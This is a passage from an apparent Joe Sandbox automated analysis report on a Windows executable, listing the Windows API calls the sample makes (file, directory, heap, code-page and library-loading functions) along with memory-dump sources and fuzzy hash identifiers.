                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 3177248105-0
                                                                          • Opcode ID: d86f7c6a22fbcd43d66b750f9005dd804d3fafa97595dbba3e36b85a353b5a5b
                                                                          • Instruction ID: b0d03d6ffe6fe50c8fa82ce140e4dcc0423b708cf03261891aa1af07890c1203
                                                                          • Opcode Fuzzy Hash: d86f7c6a22fbcd43d66b750f9005dd804d3fafa97595dbba3e36b85a353b5a5b
                                                                          • Instruction Fuzzy Hash: 4F01F236A0123AAFC7318A68BC44A977BA9EF05BB37610620FD06D7650DB20D801A6E1
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00F0D343,00000001,?,?,?,00000000,00F1551D,?,?,?), ref: 00F09F9E
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00F1551D,?,?,?,?,?,00F14FC7,?), ref: 00F09FE5
                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00F0D343,00000001,?,?), ref: 00F0A011
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$Handle
                                                                          • String ID:
                                                                          • API String ID: 4209713984-0
                                                                          • Opcode ID: cea99d713dd2398545dc83f04fb67cba13c0c77674481aa07f5c71c5da8e447b
                                                                          • Instruction ID: 4268ebf9bfd1ef68bc794a0510145cc6d2da87a90efe011a3b810f63f3e7fef7
                                                                          • Opcode Fuzzy Hash: cea99d713dd2398545dc83f04fb67cba13c0c77674481aa07f5c71c5da8e447b
                                                                          • Instruction Fuzzy Hash: 5F31C27260830AAFDB14CF20D818BAEB7A6FF84725F000519F841972D0D775AD48FBA2
                                                                          APIs
                                                                            • Part of subcall function 00F0C27E: _wcslen.LIBCMT ref: 00F0C284
                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A2D9
                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A30C
                                                                          • GetLastError.KERNEL32(?,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A329
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2260680371-0
                                                                          • Opcode ID: 73e076cc0795b6c26cf908835c06dd46402623384dd2dddeb1019234f93dd677
                                                                          • Instruction ID: 6ba2c062c1b2587df98935ca5a2f59710f81e475fe45d806ff80e7ffb1bf1ee5
                                                                          • Opcode Fuzzy Hash: 73e076cc0795b6c26cf908835c06dd46402623384dd2dddeb1019234f93dd677
                                                                          • Instruction Fuzzy Hash: C501F775A003146AEF21EB754C0ABFD33889F0A7A4F044468F901E60D5D769DA81F7B7
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F2B8B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID:
                                                                          • API String ID: 1807457897-3916222277
                                                                          • Opcode ID: ed889c85c2f3138e7c699caba94331dd3d7f118c6554330b069276b1d7515d6b
                                                                          • Instruction ID: e3900a12d31d63edf4eba67b300fa41e3dd9142cd8567d328cddfb431f44fa0a
                                                                          • Opcode Fuzzy Hash: ed889c85c2f3138e7c699caba94331dd3d7f118c6554330b069276b1d7515d6b
                                                                          • Instruction Fuzzy Hash: BE4119719042AC9EDF218E289C84BF6BBA9EF45304F1404EDE99A86142D3359A85EF60
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00F2AFDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: String
                                                                          • String ID: LCMapStringEx
                                                                          • API String ID: 2568140703-3893581201
                                                                          • Opcode ID: 437f8aa66473cf5561837795d0a2591742a4bf78369799405c6dc9baff6d8788
                                                                          • Instruction ID: 7c598b643a07dc519134a46b5e400fe7f1f4a63d329a6e135d0bea99f66ef1a4
                                                                          • Opcode Fuzzy Hash: 437f8aa66473cf5561837795d0a2591742a4bf78369799405c6dc9baff6d8788
                                                                          • Instruction Fuzzy Hash: 9D01177250521EBBCF12AF90ED01DEE7F62EF08760F014254FE1465160C636C931BB81
                                                                          APIs
                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F2A56F), ref: 00F2AF55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                          • String ID: InitializeCriticalSectionEx
                                                                          • API String ID: 2593887523-3084827643
                                                                          • Opcode ID: 86ffb83f9687041793b769804ff8f35eabf8c3030952fd535edda3413bb91282
                                                                          • Instruction ID: 4158c1d8875bd2a709da4b24d74c9dd181b704bb14e51f25f14f8e81e0f57a3d
                                                                          • Opcode Fuzzy Hash: 86ffb83f9687041793b769804ff8f35eabf8c3030952fd535edda3413bb91282
                                                                          • Instruction Fuzzy Hash: 45F0E97164A21CBFCF11AF54DC02DAE7F61EF04731F414155FD0856260DA319E10B786
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Alloc
                                                                          • String ID: FlsAlloc
                                                                          • API String ID: 2773662609-671089009
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1EAF9
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID: 3Ro
                                                                          • API String ID: 1269201914-1492261280
                                                                          APIs
                                                                            • Part of subcall function 00F2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F2BA44,?), ref: 00F2B7E6
                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00F2BA89,?,00000000), ref: 00F2BC64
                                                                          • GetCPInfo.KERNEL32(00000000,00F2BA89,?,?,?,00F2BA89,?,00000000), ref: 00F2BC77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CodeInfoPageValid
                                                                          • String ID:
                                                                          • API String ID: 546120528-0
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00F09A50,?,?,00000000,?,?,00F08CBC,?), ref: 00F09BAB
                                                                          • GetLastError.KERNEL32(?,00000000,00F08411,-00009570,00000000,000007F3), ref: 00F09BB6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          APIs
                                                                            • Part of subcall function 00F297E5: GetLastError.KERNEL32(?,00F41030,00F24674,00F41030,?,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F297E9
                                                                            • Part of subcall function 00F297E5: _free.LIBCMT ref: 00F2981C
                                                                            • Part of subcall function 00F297E5: SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F2985D
                                                                            • Part of subcall function 00F297E5: _abort.LIBCMT ref: 00F29863
                                                                            • Part of subcall function 00F2BB4E: _abort.LIBCMT ref: 00F2BB80
                                                                            • Part of subcall function 00F2BB4E: _free.LIBCMT ref: 00F2BBB4
                                                                            • Part of subcall function 00F2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00F2BA44,?), ref: 00F2B7E6
                                                                          • _free.LIBCMT ref: 00F2BA9F
                                                                          • _free.LIBCMT ref: 00F2BAD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: _free$ErrorLast_abort
                                                                          • String ID:
                                                                          • API String ID: 2991157371-0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F01E55
                                                                            • Part of subcall function 00F03BBA: __EH_prolog.LIBCMT ref: 00F03BBF
                                                                          • _wcslen.LIBCMT ref: 00F01EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: H_prolog$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2838827086-0
                                                                          APIs
                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F073BC,?,?,?,00000000), ref: 00F09DBC
                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E70
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: File$BuffersFlushTime
                                                                          • String ID:
                                                                          • API String ID: 1392018926-0
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F09F27,?,?,00F0771A), ref: 00F096E6
                                                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F09F27,?,?,00F0771A), ref: 00F09716
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00F09EC7
                                                                          • GetLastError.KERNEL32 ref: 00F09ED4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID:
                                                                          • API String ID: 2976181284-0
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00F28E75
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00F41098,00F017CE,?,?,00000007,?,?,?,00F013D6,?,00000000), ref: 00F28EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Heap$AllocAllocate_free
                                                                          • String ID:
                                                                          • API String ID: 2447670028-0
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00F110AB
                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F110B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Process$AffinityCurrentMask
                                                                          • String ID:
                                                                          • API String ID: 1231390398-0
                                                                          • Opcode ID: 366ecaa0db2a845779b8d8e240a501ea2fe50459fa208869b865f34279f916da
                                                                          • Instruction ID: 4af87c75b0185307d48c12689aa466024002b85b7ac2f8572a6855d865923760
                                                                          • Opcode Fuzzy Hash: 366ecaa0db2a845779b8d8e240a501ea2fe50459fa208869b865f34279f916da
                                                                          • Instruction Fuzzy Hash: 83E09272F00149A78F1D87A49C059EB72DEFA482283104179E603D7101F934DEC16660
                                                                          APIs
                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2673547680-0
                                                                          • Opcode ID: 4881fa1a2b10bc4b23a73834bf1af95be2fc99318c9fcf09c9b13239c9c32359
                                                                          • Instruction ID: d2528511af8cfcf48a90d93f07ea8fd8e1ee33fd564f664f4095a5ddb4f696e3
                                                                          • Opcode Fuzzy Hash: 4881fa1a2b10bc4b23a73834bf1af95be2fc99318c9fcf09c9b13239c9c32359
                                                                          • Instruction Fuzzy Hash: 34F0397225020DBBEF019F60DC45FEA37ADBF0439AF488061B949D61A0DB71DAD8FA50
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(000000FF,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641,000000FF), ref: 00F0A1F1
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641), ref: 00F0A21F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2643169976-0
                                                                          • Opcode ID: 1c9f306cb6e3b563f274b34efc84df68a5a6cbc7f128a8aa14eb9df671152e72
                                                                          • Instruction ID: f168e8c35f713bcaa909e64a74a26bc71513ec74626325b39ef64eaaa49ef8bd
                                                                          • Opcode Fuzzy Hash: 1c9f306cb6e3b563f274b34efc84df68a5a6cbc7f128a8aa14eb9df671152e72
                                                                          • Instruction Fuzzy Hash: A4E09A716402097BEB019F60DC85FEA3BACAF083D6F484021B944D20A4EB61DEC4FB60
                                                                          APIs
                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00F32641,000000FF), ref: 00F1ACB0
                                                                          • CoUninitialize.COMBASE(?,?,?,?,00F32641,000000FF), ref: 00F1ACB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: GdiplusShutdownUninitialize
                                                                          • String ID:
                                                                          • API String ID: 3856339756-0
                                                                          • Opcode ID: 652208c6eee851c2391a72c54382bb5f897e84e1a5ea6c72d45b5549bd7ebb39
                                                                          • Instruction ID: 7e5dc76622e471f046903a04cea4072720638379e6066dc906fb374a3a1eac7f
                                                                          • Opcode Fuzzy Hash: 652208c6eee851c2391a72c54382bb5f897e84e1a5ea6c72d45b5549bd7ebb39
                                                                          • Instruction Fuzzy Hash: 6FE06D72604654EFCB00DB59DC06B4AFBA9FB89F30F00426AF816D37A1CB74B841DA90
                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00F0A23A,?,00F0755C,?,?,?,?), ref: 00F0A254
                                                                            • Part of subcall function 00F0BB03: _wcslen.LIBCMT ref: 00F0BB27
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F0A23A,?,00F0755C,?,?,?,?), ref: 00F0A280
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile$_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2673547680-0
                                                                          • Opcode ID: 332cabab021085b53e879a1a8df39087e51030736dd44be82d951880f1efd973
                                                                          • Instruction ID: 6754366fa21270d33f1a9afd182280b841e28ad48492e4cecf7115332835ea13
                                                                          • Opcode Fuzzy Hash: 332cabab021085b53e879a1a8df39087e51030736dd44be82d951880f1efd973
                                                                          • Instruction Fuzzy Hash: 9AE092719001285BDB10EB64CC05BD97798AB083F5F0442B1FD44E31D0D770DE84EAE0
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F1DEEC
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00F1DF03
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                          • String ID:
                                                                          • API String ID: 2718869927-0
                                                                          • Opcode ID: e58227a60a8aa600e51cbf236a5c4617826d86ba00fcbb694124ab75d341214e
                                                                          • Instruction ID: fd1edb5e1ade34f5e8e26634d8da85c739834d29619db96928974742729ecb72
                                                                          • Opcode Fuzzy Hash: e58227a60a8aa600e51cbf236a5c4617826d86ba00fcbb694124ab75d341214e
                                                                          • Instruction Fuzzy Hash: 90E09BB550024C66DF01A760DC06FDE376C5B157C5F040851B700D60F3D97DEA51B761
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                          • String ID:
